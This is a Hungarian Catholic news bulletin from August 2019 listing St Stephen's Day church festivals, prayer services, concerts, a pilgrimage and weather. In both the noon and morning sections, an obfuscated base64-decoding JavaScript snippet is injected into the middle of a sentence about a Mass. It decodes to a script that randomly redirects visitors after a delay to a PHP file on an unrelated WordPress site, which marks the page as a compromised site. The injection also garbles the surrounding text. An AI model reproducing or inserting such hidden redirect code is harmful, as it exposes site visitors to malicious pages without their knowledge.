2019. augusztus 20. – Hírek és programajánló

H Í R E K   D É L B E N

Szent István- napi búcsúk
A gyulafehérvári egyházmegyében a vicei egyházközség filiájában, Bethlenben délután 3 órától tartják a szentmisét és Pál Áron diakónus hirdeti az igét.                                                                        Árkoson, Sepsikőröspatak filiájában, délután 4 órakor kezdődik a búcsú. A szentmise főcelebránsa és szónoka Fülöp Sándor Szabolcs újmisés, a sepsiszentgyörgyi Krisztus Király plébánia segédlelkésze.
Kolozsváron, a Donát úti Szent István-templom búcsúünnepe délután 5 órakor kezdődik. A szentbeszédet Takó István egyetemi lelkész, a kolozsvári Szent Péter és Szent Pál egyházközség plébánosa tartja. A liturgia keretében megáldják az új mechanikus orgonát, amelynek készítője Bors László csíktusnádi orgonaépítő mester.
A gyergyószentmiklósi Szent István ereklyéinek átvitele egyházközség búcsúját szintén délután 5 órakor tartják. A szentmise főcelebránsa Kovács Szabolcs újmisés.
Délután 5 órakor kezdődik a Szent István király ünnepére tartfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó szentmise a Tógátnál is, a gyergyóhódosi eltérőnél lévő keresztnél. Mindenkit szeretettel hívnak és várnak az ünnepi szentmisére. Szentbeszédet mond: Oláh Dénes marosvásárhelyi főesperes-plébános.
A medgyesi Szent István-templom búcsúját holnap délután 6 órakor ünneplik. A szentmisén Drócsa László nyárádszeredai plébános prédikál.
A borszéki plébániatemplom búcsúját szintén holnap délután 6 órakor ünneplik. A szentbeszédet Pál Vilmos gyergyóhodosi plébános tartja.
A kovásznai Szent István tiszteletére épült templom búcsúját augusztus 25-én, vasárnap déli 12 órától tartják. A szentmisén Oláh Zoltán gyulafehérvári teológiai tanár mondja a homíliát.

Taizé imaóra Nagyváradon
„Nyugalmat talál lelketek.” (Mt 11,30) mottóval taizéi imaórát tartanak a Nagyváradi Római Katolikus Püspökség és a Szent László Római Katolikus Teológiai Líceum szervezésében a nagyváradi Barátok Templomában. Várnak mindenkit augusztus 22-én, csütörtökön este 7 órára a közös imára.

Előadás és szentmise Atyában
Az atyhai római katolikus templomban augusztus 23-án, pénteken délután 5 órától hálaadó szentmisét mutat be Böjte Csaba ferences atya. Ezt megelőzően délután fél 5 órától Adorján Imre tart előadást „A szívből jövő adomány gyógyír” címmel. A szentmise után ismét egy előadás hangzik el „Isten, futás és én” címmel Csizmadia Mihály Zsolt gondolataival.

Klausenmusik
Folytatódik az Egyházzene – Kolozsvár egyesület szervezésében a nyári hangversenysorozat a kolozsvári Piarista (Szentháromság) templomban. A soron következő előadás augusztus 23-án, pénteken este 7 órától lesz. Ruzitska György halálának 150. évfordulója alkalmával a Szent Cecília kórus és zenekar ad emlékhangversenyt.

Jubileum Székelyhídon
A Székelyhídi templom búcsú ünnepe augusztus 25-én, vasárnap lesz. Ezen a napon Szűz Mária, a Szeplőtelen Fogantatás tiszteletére felszentelt műemlék épület 250 éves fennállását is ünneplik egyben. A déli 12 órakor kezdődő szent mise főcelebránsa és szónoka Scheck László érszalacsi plébános lesz.

Búcsú Biharszentjánoson
Augusztus 25-én, vasárnap déli 12 órakor lesz a nagyváradi Szent katalin-telepi plébániához, tartozó biharszentjánosi egyházközség búcsúja, melynek szónoka Ft. Kóhr Balázs atya lesz. Szeretettel várunk mindenkit

Nőszövetségek őszi találkozója
Az Erdélyi Római Katolikus Nőszövetségek Egyesülete idén ünnepli megalakulásának 20. évét. Az egyesület elnökei és lelkivezetői lelkigyakorlatos találkozóját augusztus 26-28. között Csíksomlyón tartják. Az őszi találkozó záró szentmiséjét augusztus 28-án, déli 12 órától Tamás József segédpüspök mutatja be a csíksomlyói kegytemplomban.

Lelkinap a Gerhardinumban
Szeptember 2-án, hétfőn 9-17 óra között a temesvár-erzsébetvárosi szalvatoriánus rendházban lelkinapot tartanak a Gerhardinum Római Katolikus Líceum tanárainak és nevelőinek. A programot Szilvágyi Zsolt pasztorációért felelős püspöki helynök vezeti.

Zarándoklat Máriaradnára
A nagyváradi Szent Katalin-telepi templom szeptember 8-án, vasárnap, zarándoklatot szervez Máriaradnára, 18 fős autóbusszal. Az útiköltség ára 50 lej. Jelentkezni a plébánián lehet az utazás költségének befizetésével.

Időjárás: Ma sok napsütésre, kánikulára, csapadékmentes időre számíthatunk, csupán északkeleten növekedhet meg délután kissé a felhőzet, de csapadék nem várható. A csúcshőmérséklet 30 és 35 fok között alakul.

H Í R E K   R E G G E L

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán a  kolozsmonostori templomban tartanak örökös szentségimádási napot. Járuljunk az Oltáriszentségben jelen levő Krisztus elé, fejezzük ki örömünket, hálánkat és imádatunkat.

Márton Áron emlékkiállítás
Isten Szolgája Márton Áron püspökké szentelésének 80. évfordulóján a csíknagyboldogasszonyfalvi templom udvarán található kápolnában emlékkiállítás nyílik „Imacsokrok Márton Áron püspöknek a Gyulafehérvári Főegyházmegyei Levéltár gyűjteményéből” címmel. A vándorkiállítás a mai nap folyamán tekinthető meg.

Szent István- napi búcsúk
A gyulafehérvári egyházmegyében a perkői templom búcsújára délelőtt 10 órakor a kézdiszentléleki templommal szemben lévő téren található Szent István szobortól körmenetben, imádkozva mennek a hívek Perkőre, ahol déli 12 órakor kezdődik a szentmise, melynek szónoka Berszán Lajos atya. A liturgikus zenei szolgálatot a kézdiszentléleki egyházi énekkar biztosítja, Dávid István kántor vezénylése alatt.
Mezőbándon délelőtt 11 órakor kedődik a szentmise, főcelebráns és szónok Oláh Dénes marosvásárhelyi főesperes-plébános.
Mikóújfaluban a búcsús szentmise szintén délelőtt 11 órakor kezdődik, amelynek szónoka Bátor Botond hargitafürdői pálos szerzetes.
Csíkajnádon ugyancsak délelőtt 11 órakor kezdődik a búcsús szentmise, az ünnep szónoka Ilyés Imre, a brassói Szent Kereszt felmagasztalása plébánia segédlelkésze.
Szent Istvánnak ajánlott templomot szenteltek 2018-ban Szörcsén, az imecsfalvi egyházközség filiájában ahol déli 12 órakor kezdődik az ünnepi szentmise, ahol Farkas Alajos a kézdivásárhely-kantai plébánia segédlelkésze prédikál .
A vicei egyházközség filiájában, Bethlenben délután 3 órától tartják a szentmisét és Pál Áron diakónus hirdeti az igét.                                                                                                                                 Árkoson, Sepsikőröspatak filiájában, délután 4 órakor kezdődik a búcsú. A szentmise főcelebránsa és szónoka Fülöp Sándor Szabolcs újmisés, a sepsiszentgyörgyi Krisztus Király plébánia segédlelkésze.
Kolozsváron, a Donát úti Szent István-templom búcsúünnepe délután 5 órakor kezdődik. A szentbeszédet Takó István egyetemi lelkész, a kolozsvári Szent Péter és Szent Pál egyházközség plébánosa tartja. A liturgia keretében megáldják az új mechanikus orgonát, amelynek készítője Bors László csíktusnádi orgonaépítő mester.
A gyergyószentmiklósi Szent István ereklyéinek átvitele egyházközség búcsúját szintén délután 5 órakor tartják. A szentmise főcelebránsa Kovács Szabolcs újmisés.
Délután 5 órakor kezdődik a Szent István király ünnepére tartfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó szentmise a Tógátnál is, a gyergyóhódosi eltérőnél lévő keresztnél. Mindenkit szeretettel hívnak és várnak az ünnepi szentmisére. Szentbeszédet mond: Oláh Dénes marosvásárhelyi főesperes-plébános.
A medgyesi Szent István-templom búcsúját holnap délután 6 órakor ünneplik. A szentmisén Drócsa László nyárádszeredai plébános prédikál.
A borszéki plébániatemplom búcsúját szintén holnap délután 6 órakor ünneplik. A szentbeszédet Pál Vilmos gyergyóhodosi plébános tartja.
A kovásznai Szent István tiszteletére épült templom búcsúját augusztus 25-én, vasárnap déli 12 órától tartják. A szentmisén Oláh Zoltán gyulafehérvári teológiai tanár mondja a homíliát.
A szatmári egyházmegyében Józsefházán délelőtt 11 órától kerül sor a búcsúmisére, melynek szónoka Jakkel Tamás diakónus lesz.

Kolozsvári Magyar Napok
Augusztus 17 és 25.-ke között kerül megszervezésre immár 10-dik alkalommal a Kolozsvári Magyar Napok, mely sok szép színes programot tartogat minden érdeklődő számára. Augusztus 22-én, csütörtökön délután három órától a Szent Mihály plébánia Nőszövetségének dísztermében Nagy Mihály Zoltán és Denisa Bodeanu: (Le)hallgatásra ítélve. Márton Áron püspök lehallgatási jegyzőkönyvei (1957–1960) című a könyvét a szerzők jelenlétében bemutatja: Bánkuti Gábor, a Pécsi Tudományegyetem docense, valamint Visky András, író, költő, a Kolozsvári Állami Magyar Színház művészeti igazgatója.

Lelkipásztori munkatárs képzés
A Gyulafehérvári Főegyházmegye Pasztorális Bizottsága újra meghirdeti a főegyházmegyei lelkipásztori munkatársképzést idén októbertől, Sepsiszentgyörgyön. A képzés időtartama 3 év és évi négy, hétvégi, tömbösített képzési alkalomból áll. Egy-egy képzési tömb a lelki program mellett elméleti előadások, műhelymunkák, csoportmegbeszélések keretében négy témát foglal magába. Az érdeklődők szeptember 12-ig jelentkezhetnek a gyf.pasztoralis.iroda@gmail.com email címen. A jelentkezéshez plébánosi ajánlás szükséges. A képzéssel kapcsolatosan érdeklődni lehet Molnár Izabellánál a 0753-869706-os telefonszámon.

Időjárás: Ma sok napsütésre, kánikulára, csapadékmentes időre számíthatunk, csupán északkeleten növekedhet meg délután kissé a felhőzet, de csapadék nem várható. A csúcshőmérséklet 30 és 35 fok között alakul.

MRE Hírszolgátat - 2019. augusztus 20.

About the author

Majoros Gabriella